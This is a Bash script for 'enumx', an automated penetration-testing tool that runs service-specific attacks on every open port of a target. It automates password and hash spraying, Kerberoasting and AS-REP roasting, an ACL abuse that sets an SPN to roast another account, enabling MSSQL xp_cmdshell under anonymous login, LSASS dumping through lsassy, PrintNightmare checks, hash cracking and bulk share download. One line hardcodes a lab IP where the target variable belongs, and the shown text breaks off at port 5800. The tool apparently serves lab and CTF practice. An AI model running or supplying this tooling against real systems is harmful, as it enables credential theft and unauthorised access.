#!/bin/bash
cat << "EOF"
                                         /\__     __/\
 ________ __   __   __    __   ___  ___  \   \   /   / 
|   ____/|  \ |  | |  |  |  | |   \/   |  \   \ /   / 
|  |___  |   \|  | |  |  |  | |  \  /  |   \   V   /
|   __/  |  . `  | |  |  |  | |  |\/|  |    >     <
|  |_____|  |\   | |  `--'  | |  |  |  |   /   .   \
|_______/|__| \__|  \______/  |__|  |__|  /   / \   \ 
                                         / __/   \__ \
  Version: 2.0     Author: DaddyBigFish  \/         \/  
 --------------   ----------------------       
EOF
# Required tools to be pre-installed:
#  bloodhound.py cups curl dnsutils faketime git influxdb inetutils-ftp john ldap-utils libimage-exiftool-perl
#  libkrb5-dev mariadb-server metasploit-framework nano nbtscan netcat-openbsd netexec nfs-common nmap
#  odat openssh-client openssl postgresql postgresql-contrib powerview.py python3-impacket rpcbind
#  smbclient tree wafw00f whatweb wordlists

# Usage information
if [ -z "$1" ]; then
    echo "  Examples:"
    echo "    enumx <TARGET>                - Run enumeration on the specified target."
    echo "    enumx <TARGET> web            - Run web enumeration on the specified target."
    echo "    enumx <TARGET> crack          - Attempt to quickly crack each hash within 15 seconds."
    echo "    enumx update                  - Update to the latest version of enumx."
    echo "    enumx install                 - Install the pre-required tools for enumx (Kali Linux / Debian)."
    exit 1
fi
# Update to latest version
if [[ "$1" == "update" ]]; then
    echo '     Updating to latest version...'
    rm -rf ~/.git/enumx 2>/dev/null
    git clone https://github.com/DaddyBigFish/enumx.git ~/.git/enumx 2>/dev/null
    chmod +x ~/.git/enumx/enumx 2>/dev/null
    sudo rm -rf /usr/local/bin/enumx 2>/dev/null; sudo ln -s ~/.git/enumx/enumx /usr/local/bin/enumx 2>/dev/null
    echo '     Update complete.'
    exit 1
fi
# Install the pre-required tools for enumx (Kali Linux / Debian)
if [[ "$1" == "install" ]]; then
    echo 'Installing pre-required tools for enumx (Kali Linux / Debian)...'
    sudo apt install -y bloodhound.py cups curl dnsutils faketime git influxdb inetutils-ftp john ldap-utils libimage-exiftool-perl libkrb5-dev mariadb-server metasploit-framework nano nbtscan netcat-openbsd netexec nfs-common nmap odat openssh-client openssl postgresql postgresql-contrib python3-impacket rpcbind smbclient tree wafw00f whatweb wordlists
    echo
    echo 'powerview.py installing required packages.'
    pip3 install powerview --break-system-packages | grep -viE 'already satisfied'
    gunzip /usr/share/wordlists/rockyou.txt.gz 2>/dev/null
    echo 'Install complete.'
    exit 1
fi

target=$1

# Create the enumx working directory
enumx_dir="/dev/shm/enumx/$target"
mkdir -p "$enumx_dir"

# Create files for storing found data such as usernames, passwords, hashes, creds and more
touch "$enumx_dir"/usernames
if [ ! -s "$enumx_dir/usernames" ]; then
    echo "" >> "$enumx_dir/usernames"
    echo "guest" >> "$enumx_dir/usernames"
fi
sort -u "$enumx_dir"/usernames -o "$enumx_dir"/usernames 2>/dev/null
touch "$enumx_dir"/passwords
if [ ! -s "$enumx_dir/passwords" ]; then
    echo "" >> "$enumx_dir/passwords"
fi
sort -u "$enumx_dir"/passwords -o "$enumx_dir"/passwords 2>/dev/null
touch "$enumx_dir"/hashes
sort -u "$enumx_dir"/hashes -o "$enumx_dir"/hashes 2>/dev/null
touch "$enumx_dir"/creds
sort -u "$enumx_dir"/creds -o "$enumx_dir"/creds 2>/dev/null
touch "$enumx_dir"/hcreds
sort -u "$enumx_dir"/hcreds -o "$enumx_dir"/hcreds 2>/dev/null
touch "$enumx_dir"/domains
sort -u "$enumx_dir"/domains -o "$enumx_dir"/domains 2>/dev/null

if [ ! -s "$enumx_dir/modules" ]; then
    echo "enum_av
enum_ca
spooler
printnightmare
lsassy
" >> "$enumx_dir/modules"
fi

# Enter usernames and passwords if creds parameter is selected
if [[ "$1$2" == "$target" ]]; then
  nano "$enumx_dir"/usernames
  nano "$enumx_dir"/passwords
  nano "$enumx_dir"/creds
  nano "$enumx_dir"/hashes
  nano "$enumx_dir"/hcreds
fi
# Attempt to quickly crack each hash within 15 seconds.
if [[ "$2" == "crack" ]]; then
    echo 'Cracking hashes in hashes file. This can take some time...'
    echo 'Attempting to crack each hash within 15 seconds...'
    for hash in $(cat "$enumx_dir"/hashes); do
        echo "$hash" > "$enumx_dir"/.hash
        john "$enumx_dir"/.hash -w=/usr/share/wordlists/rockyou.txt --max-run-time=15 --pot="$enumx_dir"/john.pot 2>/dev/null | grep -viE 'loaded|FAQ'
    done
    echo 'Cracking attempt completed.'
    echo
    echo 'Hashes that have been cracked:'
    cracked=$(john "$enumx_dir"/.hash --pot="$enumx_dir"/john.pot --show 2>/dev/null | sed '$d')
    echo "$cracked" | sed -E 's/.*:()/\1/' | tee -a "$enumx_dir"/passwords
    exit 1
fi
# Enter usernames and passwords if creds parameter is selected
if [[ "$2" == "web" ]]; then
  using_web=true
fi
rm "$enumx_dir/.hashes" 2>/dev/null
crack() {
	echo
    echo 'Attempting to crack hashes within 15 seconds each hash...'
    for hash in $(cat "$enumx_dir"/.hashes); do
        echo "$hash" > "$enumx_dir"/.hash
        john "$enumx_dir"/.hash -w=/usr/share/wordlists/rockyou.txt --max-run-time=15 --pot="$enumx_dir"/john.pot 2>/dev/null | grep -viE 'loaded|FAQ'
    done
    echo 'Cracking attempt completed.'
    echo
    echo 'Hashes that have been cracked:'
    cracked=$(john "$enumx_dir"/.hashes --pot="$enumx_dir"/john.pot --show 2>/dev/null | sed '$d')
    echo "$cracked" | sed -E 's/.*:()/\1/' | tee -a "$enumx_dir"/passwords
}

# Scan for open ports using nmap
open_ports=$(nmap -p- --open --min-rate 10000 "$target" | awk '{print $1}' | grep '/' | sed 's#/.*##' | sort -n)

# By default commands are taken from book.hacktricks.xyz plus added to by community updates
# Test each open port using pentesting techniques.
for port in $open_ports; do
    echo -e "\n━━━━━━━━━━━━━━━━━━━━━━━━━ PORT: $port"
    case $port in
        7)
            # https://book.hacktricks.xyz/network-services-pentesting/7-tcp-udp-pentesting-echo
            nc -uvn "$target" 7
            ;;
        21)
            # https://www.netexec.wiki/ftp-protocol/file-listing-etc
            netexec ftp "$target" -u 'anonymous' -p 'anonymous' --ls
            mkdir -p "$enumx_dir"/ftp
            for x in $(curl -s -u anonymous:anonymous -l ftp://"$target" 2>/dev/null)
            do curl -s -u anonymous:anonymous -o "$enumx_dir/ftp/$x" ftp://"$target/$x" 2>/dev/null
            done
            echo
            echo -e "Authors / Creators of files found:"
            exiftool "$enumx_dir"/ftp/* | grep -v 'Tool' | grep -E 'Author|Creator' | sed -E 's/.*:\s*(.*)/\1/' | sort -u
            ;;
        22)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-ssh
            ssh-keyscan -t rsa "$target" -p"$port"
            ;;
        23)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-telnet
            nmap -n -sV -Pn --script "*telnet* and safe" -p"$port" "$target"
            ;;
        25)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp
            nmap -p"$port" --script smtp-open-relay "$target" -v
            ;;
        53)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns
            dig axfr @"$target" +timeout=1 | sed '1d'
            ;;
        79)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-finger
            msfconsole -q -x "use auxiliary/scanner/finger/finger_users; set RHOSTS $target; run; exit"
            ;;
        80)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-web
            whatweb "http://$target:$port"
            echo
            curl -Iks "http://$target:$port" 2>/dev/null
            wafw00f "http://$target:$port" 2>/dev/null
            if [ "$using_web" == true ]; then
            	mkdir -p "$enumx_dir"/web 2>/dev/null
            	echo
            	echo 'Enumerating web directories for available files...'
            	feroxbuster -u http://"$target" -s 200 -t100 -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt --silent --no-state > "$enumx_dir/urls"
            	cat "$enumx_dir/urls" | sort -u | sed '1d' | sed '1d' | tee "$enumx_dir/urls"
            	while IFS= read -r url; do
            		curl -o "$enumx_dir/web/$(basename "$url")" "$url" 2>/dev/null
            	done < "$enumx_dir/urls"
            	echo
            	echo -e "Authors / Creators of files found:"
            	exiftool "$enumx_dir"/web/* | grep -v 'Tool' | grep -E 'Author|Creator' | sed -E 's/.*:\s*(.*)/\1/' | sort -u 2>/dev/null
           	fi
            ;;
        88)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-kerberos-88
            nmap $target -p"$port" --host-timeout 3s --min-rate 10000 | grep -vE 'Nmap|latency|nmap' | sed '1d'
            while IFS= read -r cred; do
          		read credu credp <<< $(echo "$cred" | sed 's/:/ /')
          		powerview=$(powerview "$credu":"$credp"@"$target" -q "Get-DomainObjectAcl -SecurityIdentifier "$credu"" | grep -v 'Logging')
          		echo "$powerview" | grep -iE -B 4 -A 3 'write|fullcontrol'
          		objsid=$(echo "$powerview" | grep -iE -B 4 -A 3 'write|fullcontrol' | grep -iE 'objectsid' | sed -E 's/.*: //1')
          		objuser=$(powerview "$credu":"$credp"@"$target" -q "ConvertFrom-SID -ObjectSID $objsid" | grep -v 'Logging' | sed -E 's/.*\\//')
      			if [ -n "$objsid" ]; then
	          		powerview "$credu":"$credp"@"$target" -q "Set-DomainObject -Identity $objsid -Set ServicePrincipalName='ANY/ANY'" | grep -v 'Logging'
	    			clockskew=$(nmap -sC -p139,445 10.129.194.32 --min-rate 10000 | grep -iE 'clock-skew:' | sed -E 's/.*: //' | sed -E 's/(.*h).*/\1/')
		      		for domain in $(cat "$enumx_dir/domains"); do
		      			if [ -n "$clockskew" ]; then
			      			faketime -f "+$clockskew" impacket-GetUserSPNs -request-user "$objuser" -dc-ip "$target" "$domain"/"$credu":"$credp" 2>/dev/null | grep -iE '\$krb' | tee -a "$enumx_dir/hashes" | tee -a "$enumx_dir/.hashes"       			
				      	else
				      		for i in {-24..24}; do
				      			faketime -f "+${i}h" impacket-GetUserSPNs -request-user "$objuser" -dc-ip "$target" "$domain"/"$credu":"$credp" 2>/dev/null | grep -iE '\$krb' | tee -a "$enumx_dir/hashes" | tee -a "$enumx_dir/.hashes"
				      		done
			      		fi
			      	done
	          	fi
            done < "$enumx_dir/creds"
            if [ -s "$enumx_dir/domains" ]; then
                for domain in $(cat "$enumx_dir/domains"); do
                    hash=$(PYTHONWARNINGS="ignore" impacket-GetNPUsers -usersfile "$enumx_dir/usernames" "$domain"/ -dc-ip "$target" | grep -iE '\$krb' 2>/dev/null | tee -a "$enumx_dir/hashes" | tee -a "$enumx_dir/.hashes")
                    user=$(echo "$hash" | sed -E 's/([^$]*\$){3}([^@]*)@.*/\2/')
                    PYTHONWARNINGS="ignore" impacket-GetUserSPNs -no-preauth "$user" -usersfile "$enumx_dir/usernames" -dc-host "$target" "$domain"/ | grep -iE '\$krb' 2>/dev/null | tee -a "$enumx_dir/hashes" | tee -a "$enumx_dir/.hashes"
                done
                for domain in $(cat "$enumx_dir/domains"); do
                    for cred in $(cat "$enumx_dir/creds"); do
                    	if [[ ! "$cred" =~ ^(:|[Gg]uest:)$ ]]; then
	                        PYTHONWARNINGS="ignore" impacket-GetUserSPNs -request -dc-ip "$target" "$domain"/"$cred" | grep -iE '\$krb' 2>/dev/null | tee -a "$enumx_dir/hashes" | tee -a "$enumx_dir/.hashes"
	                    fi
                    done
                done
            fi
            if [ -s "$enumx_dir/.hashes" ]; then
            	crack
           	fi
            ;;
        110)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-pop
            nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p"$port" "$target"
            ;;
        111)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-rpcbind
            rpcinfo -p "$target"
            nmap -sSUC -p"$port" "$target"
            ;;
        113)
            # https://book.hacktricks.xyz/network-services-pentesting/113-pentesting-ident
            nmap "$target" -sC
            ;;
        135)
            # https://book.hacktricks.xyz/network-services-pentesting/135-pentesting-msrpc
            impacket-rpcdump -p "$port" "$target" | grep -E 'Protocol|Provider' | grep -vE 'N/A|Interface' | awk '{print $2,$3,$4,$5,$6,$7,$8,$9,$10,$11,$12,$13,$14,$15,$16,$17,$18,$19,$20}' | grep -E 'Remote'
            ;;
        139)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb
            echo "Enumerating port $port can take some time please wait..."
            mkdir -p "$enumx_dir"/smb 2>/dev/null
       		rpcclient -U "" -N "$target" -c "enumdomusers" 2>/dev/null | sed 's/.*:\[\([^]]*\)\] .*/\1/' | grep -viE '\$|error|sm_|mailbox|_denied' | tee -a "$enumx_dir/usernames"
            sort -u "$enumx_dir"/usernames -o "$enumx_dir"/usernames 2>/dev/null
            rpcclient -U "" -N "$target" -c "dsenumdomtrusts" 2>/dev/null | awk '{print $1}' | sed '1d' | tee -a "$enumx_dir/domains"
            sort -u "$enumx_dir"/domains -o "$enumx_dir"/domains 2>/dev/null
       		rpcclient -U "" -N "$target" -c "dfsenum;netshareenum;netshareenumall;netfileenum;enumdomgroups;enumprocs;winreg_enumkey;" 2>/dev/null | sed 's/.*:\[\([^]]*\)\] .*/\1/' | grep -viE '\$|error|sm_|mailbox|_denied'
       		spray=$(netexec smb "$target" --port "$port" -u "$enumx_dir/usernames" -p "$enumx_dir/passwords" --continue-on-success | grep -viE '\\:')
       		echo "$spray" | grep -iE '[+]' | awk '{print $6}' | cut -d'\' -f2- | tee -a "$enumx_dir/creds"
	        sort -u "$enumx_dir"/creds -o "$enumx_dir"/creds 2>/dev/null
			hspray=$(netexec smb $target --port 445 -u usernames -H hashes --continue-on-success | sed 's/.*\\//1' | grep -viE 'guest|_failure|domain:')
       		echo "$hspray" | tee -a "$enumx_dir/hcreds"
			sort -u "$enumx_dir"/hcreds -o "$enumx_dir"/hcreds 2>/dev/null
			if [ -s "$enumx_dir/creds" ]; then
				ph='-p'
				file='creds'
			fi
			if [ -s "$enumx_dir/hcreds" ]; then
				ph='-H'
				file='hcreds'
			fi
			if [ -n "$file" ] && [ -s "$enumx_dir/$file" ]; then
			  	while IFS= read -r cred; do
			  		read credu credp <<< $(echo "$cred" | sed 's/:/ /')
				    shares=$(netexec smb "$target" --port "$port" -u "$credu" "$ph" "$credp" --shares)
				    groups=$(netexec smb "$target" --port "$port" -u "$credu" "$ph" "$credp" --groups)
				    ridbrute=$(netexec smb "$target" --port "$port" -u "$credu" "$ph" "$credp" --rid-brute 10000)
			        echo "$shares" | grep -iE 'domain:' | sed -E 's/.*domain:([^)]*).*/\1/' | tee -a "$enumx_dir/domains"
			        sort -u "$enumx_dir"/domains -o "$enumx_dir"/domains 2>/dev/null
				   	echo "$shares" | grep -iE 'READ|WRITE' | sed -E 's/(.*) (READ|WRITE).*/\1/' | awk '{for(i=5;i<=NF;i++) printf $i (i==NF ? "" : ""); print ""}' | tee -a "$enumx_dir/shares"
			    	sort -u "$enumx_dir"/shares -o "$enumx_dir"/shares 2>/dev/null
			        echo "$groups" | grep -viE '[*]|[-]' | sed -E '1d'
			        echo "$ridbrute" | grep -viE 'erro|│|╭|╰|[*]|[-]' | grep -E '[+]|SidTypeUser' | sed -E '1d'
			        echo "$ridbrute" | grep -iE 'SidTypeUser' | grep -viE 'WINDOWS|\$' | awk '{print $6}' | awk -F'\\' '{print $2}' | grep -viE '\$|error|sm_|mailbox|_denied' | tee -a "$enumx_dir/usernames"
			        sort -u "$enumx_dir"/usernames -o "$enumx_dir"/usernames 2>/dev/null
			        if [ -n "$credp" ]; then
			            echo "Using netexec modules as $credu:$credp on $target..."
				        while IFS= read -r module; do
	 	                    netexec smb "$target" --port "$port" -u "$credu" "$ph" "$credp" -M "$module" 2>/dev/null | grep -viE '[*]|[+]|erro|│|╭|╰| |is not|failed|refused|cannot|associated'
	   	            		echo
		 	            done < "$enumx_dir/modules"
				    fi
				    if [ "$file" == "creds" ]; then
						while IFS= read -r share; do
							echo "Authenticating as $credu:$credp on share $share..."
							smbclient "//$target/$share" -U "$credu%$credp" -c "lcd $enumx_dir/smb; recurse ON; prompt OFF; mget *" >/dev/null 2>&1
						done < "$enumx_dir/shares"
					fi
				    if [ "$file" == "hcreds" ]; then
						while IFS= read -r share; do
							echo "Authenticating as $credu:$credp on share $share..."
							smbclient "//$target/$share" --pw-nt-hash -U "$credu%$credp" -c "lcd $enumx_dir/smb; recurse ON; prompt OFF; mget *" >/dev/null 2>&1
						done < "$enumx_dir/shares"
					fi
	 	        done < "$enumx_dir/$file"
	 	    fi
            tree "$enumx_dir"/smb 2>/dev/null
            find "$enumx_dir"/smb -type f 2>/dev/null
            echo
            nbtscan "$target"/24
            ;;
        143)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-imap
            nmap -sV --script imap-brute -p "$port" "$target"
            ;;
        389)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap
            ldap=$(nmap --script "ldap* and not brute" -p "$port" "$target")
            echo "$ldap" | grep -i 'dnshostname' | awk '{print $3}' | grep -vi 'requesting:' | tee -a "$enumx_dir/domains"
			sort -u "$enumx_dir"/domains -o "$enumx_dir"/domains 2>/dev/null
            echo
            echo "$ldap" | grep -i 'namingcontexts' | awk '{print $3}' | grep -vi 'requesting:'
            echo "$ldap" | grep -i 'uid:' | awk '{print $3}' | tee -a "$enumx_dir/usernames"
            echo "$ldap" | grep -i 'NTPassword:' | awk '{print $3}' | tee -a "$enumx_dir/hashes" | tee -a "$enumx_dir/.hashes"
            echo "$ldap" | grep -viE 'Nmap|latency|supported'
            while IFS= read -r cred; do
                read credu credp <<< $(echo "$cred" | sed 's/:/ /')
                if [ -n "$credp" ]; then
                    mkdir -p "$enumx_dir"/bloodhound 2>/dev/null
                        rm "$enumx_dir"/*.json 2>/dev/null
                        rm "$enumx_dir/bloodhound"/*.json 2>/dev/null
                        echo "Enumerating with bloodhound-python as $credu:$credp..."
                            while IFS= read -r domain; do
                                while IFS= read -r dc; do
                                    bloodhound-python -c default -u "$credu" -p "$credp" -d "$domain" -dc "$dc" -ns "$target" 2>&1 | grep -v '^[[:space:]]\{4,\}' | grep -vE 'exception|timed out|Querying|/usr/|Traceback|LifetimeTimeout|Done in|10 workers|Getting TGT|Error:' >> output
                                    bloodhound-python -c all -u "$credu" -p "$credp" -d "$domain" -dc "$dc" -ns "$target" 2>&1 | grep -v '^[[:space:]]\{4,\}' | grep -vE 'exception|timed out|Querying|/usr/|Traceback|LifetimeTimeout|Done in|10 workers|Getting TGT|Error:' >> output
                                    sort -u "$enumx_dir"/output -o "$enumx_dir"/output 2>/dev/null
                                done < "$enumx_dir/domains"
                            done < "$enumx_dir/domains"
                            mv *.json "$enumx_dir/bloodhound" 2>/dev/null
                            rm "$enumx_dir"/*.json 2>/dev/null
                            tree "$enumx_dir/bloodhound" 2>/dev/null
                fi
            done < "$enumx_dir/creds"
            if [ -s "$enumx_dir/.hashes" ]; then
            	crack
           	fi
            ;;
        443)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-web          
            whatweb "https://$target:$port"
            echo
            curl -Iks "https://$target:$port" 2>/dev/null
            echo
            echo | openssl s_client -connect "$target:$port" -servername "$target" 2>/dev/null | openssl x509 -text | grep 'CN=' | awk -F 'CN=|,' '{print $2}' | grep -viE 'DC|-'
            echo | openssl s_client -connect "$target:$port" -servername "$target" 2>/dev/null | openssl x509 -outform PEM
            wafw00f "https://$target:$port" 2>/dev/null
            if [ "$using_web" == true ]; then
              	mkdir -p "$enumx_dir"/web 2>/dev/null
              	echo
            	echo 'Enumerating web directories for available files...'
            	feroxbuster -u https://"$target" -s 200 -t100 -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt --silent --no-state > "$enumx_dir/urls"
            	cat "$enumx_dir/urls" | sort -u | sed '1d' | sed '1d' | tee "$enumx_dir/urls"
            	while IFS= read -r url; do
            		curl -o "$enumx_dir/web/$(basename "$url")" "$url" 2>/dev/null
            	done < "$enumx_dir/urls"
           	fi
          	echo
           	echo -e "Authors / Creators of files found:"
           	exiftool "$enumx_dir"/web/* | grep -v 'Tool' | grep -E 'Author|Creator' | sed -E 's/.*:\s*(.*)/\1/' | sort -u 2>/dev/null
            ;;
        445)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb
            echo "Enumerating port $port can take some time please wait..."
            mkdir -p "$enumx_dir"/smb 2>/dev/null
       		rpcclient -U "" -N "$target" -c "enumdomusers" 2>/dev/null | sed 's/.*:\[\([^]]*\)\] .*/\1/' | grep -viE '\$|error|sm_|mailbox|_denied' | tee -a "$enumx_dir/usernames"
            sort -u "$enumx_dir"/usernames -o "$enumx_dir"/usernames 2>/dev/null
            rpcclient -U "" -N "$target" -c "dsenumdomtrusts" 2>/dev/null | awk '{print $1}' | sed '1d' | tee -a "$enumx_dir/domains"
            sort -u "$enumx_dir"/domains -o "$enumx_dir"/domains 2>/dev/null
       		rpcclient -U "" -N "$target" -c "dfsenum;netshareenum;netshareenumall;netfileenum;enumdomgroups;enumprocs;winreg_enumkey;" 2>/dev/null | sed 's/.*:\[\([^]]*\)\] .*/\1/' | grep -viE '\$|error|sm_|mailbox|_denied'
       		spray=$(netexec smb "$target" --port "$port" -u "$enumx_dir/usernames" -p "$enumx_dir/passwords" --continue-on-success | grep -viE '\\:')
       		echo "$spray" | grep -iE '[+]' | awk '{print $6}' | cut -d'\' -f2- | tee -a "$enumx_dir/creds"
	        sort -u "$enumx_dir"/creds -o "$enumx_dir"/creds 2>/dev/null
			hspray=$(netexec smb "$target" --port "$port" -u "$enumx_dir/usernames" -H "$enumx_dir/hashes" --continue-on-success | sed 's/.*\\//1' | grep -viE 'guest|_failure|domain:')
       		echo "$hspray" | tee -a "$enumx_dir/hcreds"
			sort -u "$enumx_dir"/hcreds -o "$enumx_dir"/hcreds 2>/dev/null
			if [ -s "$enumx_dir/creds" ]; then
				ph='-p'
				file='creds'
			fi
			if [ -s "$enumx_dir/hcreds" ]; then
				ph='-H'
				file='hcreds'
			fi
			if [ -n "$file" ] && [ -s "$enumx_dir/$file" ]; then
			  	while IFS= read -r cred; do
			  		read credu credp <<< $(echo "$cred" | sed 's/:/ /')
				    shares=$(netexec smb "$target" --port "$port" -u "$credu" "$ph" "$credp" --shares)
				    groups=$(netexec smb "$target" --port "$port" -u "$credu" "$ph" "$credp" --groups)
				    ridbrute=$(netexec smb "$target" --port "$port" -u "$credu" "$ph" "$credp" --rid-brute 10000)
			        echo "$shares" | grep -iE 'domain:' | sed -E 's/.*domain:([^)]*).*/\1/' | tee -a "$enumx_dir/domains"
			        sort -u "$enumx_dir"/domains -o "$enumx_dir"/domains 2>/dev/null
				   	echo "$shares" | grep -iE 'READ|WRITE' | sed -E 's/(.*) (READ|WRITE).*/\1/' | awk '{for(i=5;i<=NF;i++) printf $i (i==NF ? "" : ""); print ""}' | tee -a "$enumx_dir/shares"
			    	sort -u "$enumx_dir"/shares -o "$enumx_dir"/shares 2>/dev/null
			        echo "$groups" | grep -viE '[*]|[-]' | sed -E '1d'
			        echo "$ridbrute" | grep -viE 'erro|│|╭|╰|[*]|[-]' | grep -E '[+]|SidTypeUser' | sed -E '1d'
			        echo "$ridbrute" | grep -iE 'SidTypeUser' | grep -viE 'WINDOWS|\$' | awk '{print $6}' | awk -F'\\' '{print $2}' | grep -viE '\$|error|sm_|mailbox|_denied' | tee -a "$enumx_dir/usernames"
			        sort -u "$enumx_dir"/usernames -o "$enumx_dir"/usernames 2>/dev/null
			        if [ -n "$credp" ]; then
			            echo "Using netexec modules as $credu:$credp on $target..."
				        while IFS= read -r module; do
	 	                    netexec smb "$target" --port "$port" -u "$credu" "$ph" "$credp" -M "$module" 2>/dev/null | grep -viE '[*]|[+]|erro|│|╭|╰| |is not|failed|refused|cannot|associated'
	   	            		echo
		 	            done < "$enumx_dir/modules"
				    fi
				    if [ "$file" == "creds" ]; then
						while IFS= read -r share; do
							echo "Authenticating as $credu:$credp on share $share..."
							smbclient "//$target/$share" -U "$credu%$credp" -c "lcd $enumx_dir/smb; recurse ON; prompt OFF; mget *" >/dev/null 2>&1
						done < "$enumx_dir/shares"
					fi
				    if [ "$file" == "hcreds" ]; then
						while IFS= read -r share; do
							echo "Authenticating as $credu:$credp on share $share..."
							smbclient "//$target/$share" --pw-nt-hash -U "$credu%$credp" -c "lcd $enumx_dir/smb; recurse ON; prompt OFF; mget *" >/dev/null 2>&1
						done < "$enumx_dir/shares"
					fi
	 	        done < "$enumx_dir/$file"
	 	    fi
            tree "$enumx_dir"/smb 2>/dev/null
            find "$enumx_dir"/smb -type f 2>/dev/null
            echo
            nbtscan "$target"/24
            ;;
        465)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp
            nmap -p"$port" --script smtp-open-relay "$target" -v
            ;;
        587)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp
            nmap -p"$port" --script smtp-open-relay "$target" -v
            ;;
        593)
            # https://book.hacktricks.xyz/network-services-pentesting/135-pentesting-msrpc
            impacket-rpcdump -p "$port" "$target" | grep -Ei 'Protocol|Provider' | grep -vEi 'N/A|Interface' | awk '{print $2,$3,$4,$5,$6,$7,$8,$9,$10,$11,$12,$13,$14,$15,$16,$17,$18,$19,$20}' | grep -Ei 'Remote'
            ;;
        623)
            # https://book.hacktricks.xyz/network-services-pentesting/623-udp-ipmi
            msfconsole -q -x "use auxiliary/scanner/ipmi/ipmi_dumphashes; set RHOSTS $target; set RPORT "$port"; run; exit"
            ;;
        631)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp
            lpinfo -v "$target"
            ;;
        636)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap
            LDAPTLS_REQCERT=never ldapsearch -H "ldaps://$target" -x -s base dnshostname | grep -i 'dnshostname' | awk '{print $2}' | grep -vi 'requesting:'
            echo
            LDAPTLS_REQCERT=never ldapsearch -H "ldaps://$target" -x -s base namingcontexts | grep -i 'namingcontexts' | awk '{print $2}' | grep -vi 'requesting:'
            nmap --script "ldap* and not brute" -p "$port" "$target" | grep -iE 'uid:|NTPassword' | awk '{print $3}'
            nmap --script "ldap* and not brute" -p "$port" "$target" | grep -viE 'Nmap|latency|supported'
            while IFS= read -r cred; do
                read credu credp <<< $(echo "$cred" | sed 's/:/ /')
                if [ -n "$credp" ]; then
                    mkdir -p "$enumx_dir"/bloodhound 2>/dev/null
                        rm "$enumx_dir"/*.json 2>/dev/null
                        rm "$enumx_dir/bloodhound"/*.json 2>/dev/null
                        echo "Enumerating with bloodhound-python as $credu:$credp..."
                            while IFS= read -r domain; do
                                while IFS= read -r dc; do
                                    bloodhound-python -c default -u "$credu" -p "$credp" -d "$domain" -dc "$dc" -ns "$target" 2>&1 | grep -v '^[[:space:]]\{4,\}' | grep -vE 'exception|timed out|Querying|/usr/|Traceback|LifetimeTimeout|Done in|10 workers|Getting TGT|Error:' >> output
                                    bloodhound-python -c all -u "$credu" -p "$credp" -d "$domain" -dc "$dc" -ns "$target" 2>&1 | grep -v '^[[:space:]]\{4,\}' | grep -vE 'exception|timed out|Querying|/usr/|Traceback|LifetimeTimeout|Done in|10 workers|Getting TGT|Error:' >> output
                                    sort -u "$enumx_dir"/output -o "$enumx_dir"/output 2>/dev/null
                                done < "$enumx_dir/domains"
                            done < "$enumx_dir/domains"
                            mv *.json "$enumx_dir/bloodhound" 2>/dev/null
                            rm "$enumx_dir"/*.json 2>/dev/null
                            tree "$enumx_dir/bloodhound" 2>/dev/null
                fi
            done < "$enumx_dir/creds"
            ;;
        993)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-imap
            nmap -sV --script imap-brute -p "$port" "$target"
            ;;
        995)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-pop
            nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p "$port" "$target"
            ;;
        1026)
            # https://book.hacktricks.xyz/network-services-pentesting/1026-pentesting-rusersd
            rusers -l "$target"
            ;;
        1433)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
            netexec mssql "$target" -u 'anonymous' -p 'anonymous' -q "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
            netexec mssql "$target" -u 'anonymous' -p 'anonymous' -x "whoami"
            ;;
        1521)
            # https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener
            odat all -s "$target"
            ;;
        1522)
            # https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener
            odat all -s "$target"
            ;;
        1529)
            # https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener
            odat all -s "$target"
            ;;
        2049)
            # https://book.hacktricks.xyz/network-services-pentesting/nfs-service-pentesting
            for x in $(showmount -e "$target" | awk '{print $1}' | grep -v 'Export')
            do mkdir -p "$enumx_dir"/mnt"$x"
            sudo mount -t nfs "$target":"$x" "$enumx_dir"/mnt"$x" -o nolock
            tree -puga "$enumx_dir"/mnt"$x"
            done
            ;;
        3306)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-mysql
            mysql -h "$target" -u root@localhost -e 'show databases;'
            ;;
        3389)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-rdp
            nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p "$port" "$target"
            ;;
        5000)
            # https://book.hacktricks.xyz/network-services-pentesting/5000-pentesting-docker-registry
            curl -s http://"$target":"$port"/v2/_catalog
            curl -s -k https://"$target":"$port"/v2/_catalog
            ;;
        5432)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql
            psql -h "$target" -p "$port" -d postgres -U postgres
            ;;
        5433)
            # https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql
            psql -h "$target" -p "$port" -d postgres -U postgres
            ;;
        5800)
